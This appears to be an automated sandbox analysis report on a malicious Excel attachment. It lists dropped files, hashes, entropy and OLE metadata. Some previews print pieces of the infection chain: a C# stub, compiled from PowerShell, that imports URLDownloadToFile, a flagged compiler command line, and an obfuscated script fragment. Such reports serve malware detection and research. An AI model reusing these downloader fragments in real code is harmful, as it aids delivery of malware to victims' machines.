                                                                                                                                                                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:1
                                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                  File Type:very short file (no magic)
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1
                                                                                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:3:U:U
                                                                                                                                                                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:1
                                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                  File Type:very short file (no magic)
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1
                                                                                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:3:U:U
                                                                                                                                                                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:1
                                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                  File Type:very short file (no magic)
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1
                                                                                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:3:U:U
                                                                                                                                                                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:1
                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                                                                                  File Type:MSVC .res
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):652
                                                                                                                                                                                                                  Entropy (8bit):3.096044014379374
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryBak7YnqqFPN5Dlq5J:+RI+ycuZhNjakSFPNnqX
                                                                                                                                                                                                                  MD5:56058642723A4A70EDFC4D22B7C78125
                                                                                                                                                                                                                  SHA1:315DC8241A7174A5F146C47E54727EAD7F627D7B
                                                                                                                                                                                                                  SHA-256:3CA6D3456D93C12466E712FFC6A54022663F12154F4E40706F9A3C1D876DD4BB
                                                                                                                                                                                                                  SHA-512:83CD7187CE65B342204922F68847DBDB537FFFCA9A5E3CAB90413A77C839F4C60F434BE0BD3ECEEF56FB2488A1CCB09274915EE36960B2F7B15271DD6FC2E15C
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...x.c.y.g.t.r.x.b...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...x.c.y.g.t.r.x.b...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                  File Type:C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (347)
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):469
                                                                                                                                                                                                                  Entropy (8bit):3.718774945115849
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:6:V/DsYLDS81zuclr/VMGpFQXReKJ8SRHy4H0qILmiEWOYey:V/DTLDfuctXSXfHi+Wtey
                                                                                                                                                                                                                  MD5:727AC40544404E45480F402CFA6F0FAC
                                                                                                                                                                                                                  SHA1:D2C20E9E01B6C518C264D7ACDF3B11EFCAD11E72
                                                                                                                                                                                                                  SHA-256:33E16396400813988F0768EA7C3C1C216D5E3F037D6344890E5E2F0123287540
                                                                                                                                                                                                                  SHA-512:4A7F4FC8510AAD13A8537BD7BE94F8442D85A3FE9A565FE2CF7D6DB9144267FDFF6800A5A7DE63348A6BA3D75BB4EB03AB848D507297BEB706F5BEE6848F595D
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.using System;.using System.Runtime.InteropServices;..namespace puNQBvGEu.{. public class beKlAqtAa. {. [DllImport("urlmOn", CharSet = CharSet.Unicode)]public static extern IntPtr URLDownloadToFile(IntPtr wLAagwow,string n,string GRj,uint gwp,IntPtr qvW);.. }..}.
                                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                  File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (366), with no line terminators
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):369
                                                                                                                                                                                                                  Entropy (8bit):5.238176089214339
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2P23fZkixGzxs7+AEszIP23fZkixb:p37Lvkmb6KzhIWZEohF
                                                                                                                                                                                                                  MD5:19F4A4A53FBF0DB5D7DD5007AEBE386C
                                                                                                                                                                                                                  SHA1:D247988680BDBF5642BB8483482E01B0D9FA50CB
                                                                                                                                                                                                                  SHA-256:0831F058CDDCA5A136BBF6251C6F07131431D056C37896859EC86A766E261982
                                                                                                                                                                                                                  SHA-512:5A8B8036A291385101B45531B01DCF275E07DEC6245E4967D994DAEAB40EA710E30C7195DE06DFBBA03E5DFF3D6954E08E61FBFD6238B7E7E4E279A75BA18895
                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                  Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\xcygtrxb\xcygtrxb.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\xcygtrxb\xcygtrxb.0.cs"
                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):3072
                                                                                                                                                                                                                  Entropy (8bit):2.800456159236448
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:24:etGSZPBu5exl8e6WkEd/Ht5CAtkZfxhGwtjcUWI+ycuZhNjakSFPNnq:6asx+e649Ht5CnJxh5tA31ulja3fq
                                                                                                                                                                                                                  MD5:E7639EC15BC05CF3A479C582420EC522
                                                                                                                                                                                                                  SHA1:F4F71CBFDD7E95004ACDD22235B902BEB49FE6A4
                                                                                                                                                                                                                  SHA-256:5E83950716B7C85D4B2FC015670014F475C1229B70F3626C53285477C9DE1109
                                                                                                                                                                                                                  SHA-512:9085F2C0DBF5F803EF3BECFA51E8F423FA37838E6C62A9DBD8751F48C810DC50BF0B84D8494455BF570785CDD824E2CF0772756446434EBD88495B9F27E9628B
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....#g...........!.................#... ...@....... ....................................@.................................T#..W....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ................................................................(....*BSJB............v4.0.30319......l.......#~..........#Strings............#US.........#GUID.......L...#Blob...........G.........%3............................................................;.4.....q.....q...........................!.............. B.....P ......T.........Z.....c.....e.....i.....m...T.....T...!.T.....T.......!.....*.......B.......................................+..........<Module>.xc
                                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                  File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (445), with CRLF, CR line terminators
                                                                                                                                                                                                                  Category:modified
                                                                                                                                                                                                                  Size (bytes):866
                                                                                                                                                                                                                  Entropy (8bit):5.339476917767024
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:24:AId3ka6KzLEo2KaMD5DqBVKVrdFAMBJTH:Akka60LEo2KdDcVKdBJj
                                                                                                                                                                                                                  MD5:AC75E81F19034D74C252C0D229BBC37A
                                                                                                                                                                                                                  SHA1:D6FFC1B45FAAF2BFFDCA1DC795D9EE55C4EBE973
                                                                                                                                                                                                                  SHA-256:E843FDB4E63A2B6BB50CECBB21AD8DD4B47CEF92D468D6077149D2519BF60595
                                                                                                                                                                                                                  SHA-512:5CB97DD662119FD071AFBBF4C4AD44AB82F9FA4ACB1B6267EC58836A919806398327CA602A2A2F01504EE1DDB8653103F4FB39ECEDB00A755A3F5A2F61F8084A
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\xcygtrxb\xcygtrxb.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\xcygtrxb\xcygtrxb.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.3761.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                                                                                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):512
                                                                                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:3::
                                                                                                                                                                                                                  MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                                                                  SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                                                                  SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                                                                  SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):118784
                                                                                                                                                                                                                  Entropy (8bit):7.1374541129258855
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:1536:4w1QXXcX39wuzKhxSC6mLXfhHWwNiqHy1S6F8b2SQrEkawpoXIomu:4OHnykf2XfhHWw3eFHrE2sIom
                                                                                                                                                                                                                  MD5:90FE15F4BFD75D550611E8E05AA48E8F
                                                                                                                                                                                                                  SHA1:CCA96DAF3F086AC30A0E016ED5FD1F32A89287CE
                                                                                                                                                                                                                  SHA-256:5B59DF6AEC3E91ADB5D9F4A1A6C0509906C210B606B526E54A6FF568AFADC642
                                                                                                                                                                                                                  SHA-512:666D791F7942D5E098A24D8DEE49F6BCE4D6F718F02BAC871CCBF81E54319888408F4CC086C61EFBDC2D5ABB84BB6C0CE8AD1FB4E3C533580B7B8098B3C651E4
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):512
                                                                                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:3::
                                                                                                                                                                                                                  MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                                                                  SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                                                                  SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                                                                  SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                                                  File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):104960
                                                                                                                                                                                                                  Entropy (8bit):7.7683416405943655
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:1536:qw1QXXcX39wuzKhxSC6mLXfhHWwNiqHy1S6F8b2SQrEkawpoXIomu:qOHnykf2XfhHWw3eFHrE2sIom
                                                                                                                                                                                                                  MD5:072C436994F2A5243BEC038835BE6C59
                                                                                                                                                                                                                  SHA1:3447AB82E4C989931E38526FD101F27BEECF33F1
                                                                                                                                                                                                                  SHA-256:7593D1CC84326211526BD862359ACA7B9FE01187C3D56A759DDD4CE31E2C9287
                                                                                                                                                                                                                  SHA-512:73A356F33D6B8E3904E5C0DC5D2C272F4CC5CDE4316A696DEDEC4097586C83F00B00686EBCE6FFA733958B4AA4FF3C8CE9113A3BA705858E6351B29B15D62B09
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:......................>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...
                                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):142374
                                                                                                                                                                                                                  Entropy (8bit):3.677260536494028
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:3072:WKj6gt5pyGwgKAsMA/ywdctlIG6ZIrXEFlI:YAsMAawdV2zMlI
                                                                                                                                                                                                                  MD5:56B6F31B8CD3BA627DEEBA14CCA18DE8
                                                                                                                                                                                                                  SHA1:16CEA6537A5E76140939C4514E90DAB9E85787FE
                                                                                                                                                                                                                  SHA-256:0F0E3EADB94941689F2A80003A1401274075759ECB2837129EAE3CF37BF724FB
                                                                                                                                                                                                                  SHA-512:B1B70CA9F8E091038EBC925634E96F0BA4E701713A6A0A4957A9C889055C66EF6E3A49C9832C63A55441A3C5AA464617C4EFB105BF1C2FCC587EA16BF268E175
                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                  Preview:..p.r.i.v.a.t.e. .f.u.n.c.t.i.o.n. .C.r.e.a.t.e.S.e.s.s.i.o.n.(.w.s.m.a.n.,. .c.o.n.S.t.r.,. .o.p.t.D.i.c.,. .a.l.l.o.c.h.i.r.i.a.)..... . . . .d.i.m. .g.a.l.h.a.r.d.a.m.e.n.t.e.F.l.a.g.s..... . . . .d.i.m. .c.o.n.O.p.t. ..... . . . .d.i.m. .g.a.l.h.a.r.d.a.m.e.n.t.e..... . . . .d.i.m. .a.u.t.h.V.a.l..... . . . .d.i.m. .e.n.c.o.d.i.n.g.V.a.l..... . . . .d.i.m. .e.n.c.r.y.p.t.V.a.l..... . . . .d.i.m. .p.w..... . . . .d.i.m. .t.o.u.t..... . . . .'. .p.r.o.x.y. .i.n.f.o.r.m.a.t.i.o.n..... . . . .d.i.m. .p.r.o.x.y.A.c.c.e.s.s.T.y.p.e..... . . . .d.i.m. .p.r.o.x.y.A.c.c.e.s.s.T.y.p.e.V.a.l..... . . . .d.i.m. .p.r.o.x.y.A.u.t.h.e.n.t.i.c.a.t.i.o.n.M.e.c.h.a.n.i.s.m..... . . . .d.i.m. .p.r.o.x.y.A.u.t.h.e.n.t.i.c.a.t.i.o.n.M.e.c.h.a.n.i.s.m.V.a.l..... . . . .d.i.m. .p.r.o.x.y.U.s.e.r.n.a.m.e..... . . . .d.i.m. .p.r.o.x.y.P.a.s.s.w.o.r.d..... . . . . ..... . . . .g.a.l.h.a.r.d.a.m.e.n.t.e.F.l.a.g.s. .=. .0..... . . . .p.r.o.x.y.A.c.c.e.s.s.T.y.p.e. .=. .0..... . . . .p.r.o.x.y.A.c.c.e.s.s.T.y.
                                                                                                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                                                  File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Thu Oct 31 04:14:13 2024, Security: 1
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):637440
                                                                                                                                                                                                                  Entropy (8bit):7.961391373080288
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:12288:UAGdY3BPmGuo/EHIYuCefhauTw+sBVpGhadCMTkuD31k+nx:zcoYuDz3sbRCMTjP
                                                                                                                                                                                                                  MD5:D2A07E6DE3E031DFA4EA1644FF513BE1
                                                                                                                                                                                                                  SHA1:9AE5B19CFD97C5F357B92CAC98FFD4CE45C40426
                                                                                                                                                                                                                  SHA-256:518AF69B1FC69F8B6F295AB32F0844F4B65FA3439AD50248D6E6EBA77D97FD19
                                                                                                                                                                                                                  SHA-512:912AF3391482BF458D321D952AEAEDC3AB7EB34122C4443002B991C114778C46AE9951F9E4850534E2AF3EB71220314445C9DBAB15283CB792BB8D956D46768E
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:......................>...................................-.................../.......y.......{.......}................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...................1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...
                                                                                                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):26
                                                                                                                                                                                                                  Entropy (8bit):3.95006375643621
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                                  MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                                  SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                                  SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                                  SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                                                  File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Thu Oct 31 04:14:13 2024, Security: 1
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):637440
                                                                                                                                                                                                                  Entropy (8bit):7.961391373080288
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:12288:UAGdY3BPmGuo/EHIYuCefhauTw+sBVpGhadCMTkuD31k+nx:zcoYuDz3sbRCMTjP
                                                                                                                                                                                                                  MD5:D2A07E6DE3E031DFA4EA1644FF513BE1
                                                                                                                                                                                                                  SHA1:9AE5B19CFD97C5F357B92CAC98FFD4CE45C40426
                                                                                                                                                                                                                  SHA-256:518AF69B1FC69F8B6F295AB32F0844F4B65FA3439AD50248D6E6EBA77D97FD19
                                                                                                                                                                                                                  SHA-512:912AF3391482BF458D321D952AEAEDC3AB7EB34122C4443002B991C114778C46AE9951F9E4850534E2AF3EB71220314445C9DBAB15283CB792BB8D956D46768E
                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                  Preview:......................>...................................-.................../.......y.......{.......}................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...................1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...
                                                                                                                                                                                                                  File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Wed Oct 30 17:50:53 2024, Security: 1
                                                                                                                                                                                                                  Entropy (8bit):7.968601841695132
                                                                                                                                                                                                                  TrID:
                                                                                                                                                                                                                  • Microsoft Excel sheet (30009/1) 78.94%
                                                                                                                                                                                                                  • Generic OLE2 / Multistream Compound File (8008/1) 21.06%
                                                                                                                                                                                                                  File name:A & C Metrology OC 545714677889Materiale.xls
                                                                                                                                                                                                                  File size:663'552 bytes
                                                                                                                                                                                                                  MD5:3d240803d6a9ad22dcc9d51d15c89279
                                                                                                                                                                                                                  SHA1:5f93ce2e9216c89d155ec35b60dc2aae2f618bbd
                                                                                                                                                                                                                  SHA256:d4d28af1f5d5e72ff66ae165e2d232764bc88f7dfdd380cce3b5c7a593fd9e40
                                                                                                                                                                                                                  SHA512:47de9af2ac30a280035e372640bbb0662b6c68b5884fc6b43aed286737ee8d5814de3f98b2baf0f6399794807756e5482f4c1fcc93519c091ebb368c77f44800
                                                                                                                                                                                                                  SSDEEP:12288:7FdWr5iDaBPSeki9n/sTBkgn8OK+zXRO+fW/CNNrHQ8Np2:SAaBSLMuBk6DRfVrz2
                                                                                                                                                                                                                  TLSH:11E42323A6CA9F02D3036C3B036618EA497CEC109B56D10B2DDCB36D9A797EF395519C
                                                                                                                                                                                                                  File Content Preview:........................>...................................-.................../...0...........a.......c.......e..............................................................................................................................................
                                                                                                                                                                                                                  Icon Hash:276ea3a6a6b7bfbf
                                                                                                                                                                                                                  Document Type:OLE
                                                                                                                                                                                                                  Number of OLE Files:1
                                                                                                                                                                                                                  Has Summary Info:
                                                                                                                                                                                                                  Application Name:Microsoft Excel
                                                                                                                                                                                                                  Encrypted Document:True
                                                                                                                                                                                                                  Contains Word Document Stream:False
                                                                                                                                                                                                                  Contains Workbook/Book Stream:True
                                                                                                                                                                                                                  Contains PowerPoint Document Stream:False
                                                                                                                                                                                                                  Contains Visio Document Stream:False
                                                                                                                                                                                                                  Contains ObjectPool Stream:False
                                                                                                                                                                                                                  Flash Objects Count:0
                                                                                                                                                                                                                  Contains VBA Macros:False
                                                                                                                                                                                                                  Code Page:1252
                                                                                                                                                                                                                  Author:
                                                                                                                                                                                                                  Last Saved By:
                                                                                                                                                                                                                  Create Time:2006-09-16 00:00:00
                                                                                                                                                                                                                  Last Saved Time:2024-10-30 17:50:53
                                                                                                                                                                                                                  Creating Application:Microsoft Excel
                                                                                                                                                                                                                  Security:1
                                                                                                                                                                                                                  Document Code Page:1252
                                                                                                                                                                                                                  Thumbnail Scaling Desired:False
                                                                                                                                                                                                                  Contains Dirty Links:False
                                                                                                                                                                                                                  Shared Document:False
                                                                                                                                                                                                                  Changed Hyperlinks:False
                                                                                                                                                                                                                  Application Version:786432
                                                                                                                                                                                                                  General
                                                                                                                                                                                                                  Stream Path:\x1CompObj
                                                                                                                                                                                                                  CLSID:
                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                  Stream Size:114
                                                                                                                                                                                                                  Entropy:4.25248375192737
                                                                                                                                                                                                                  Base64 Encoded:True
                                                                                                                                                                                                                  Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
                                                                                                                                                                                                                  Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                  General
                                                                                                                                                                                                                  Stream Path:\x5DocumentSummaryInformation
                                                                                                                                                                                                                  CLSID:
                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                  Stream Size:244
                                                                                                                                                                                                                  Entropy:2.889430592781307
                                                                                                                                                                                                                  Base64 Encoded:False
                                                                                                                                                                                                                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . S h e e t 2 . . . . . S h e e t 3 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . .
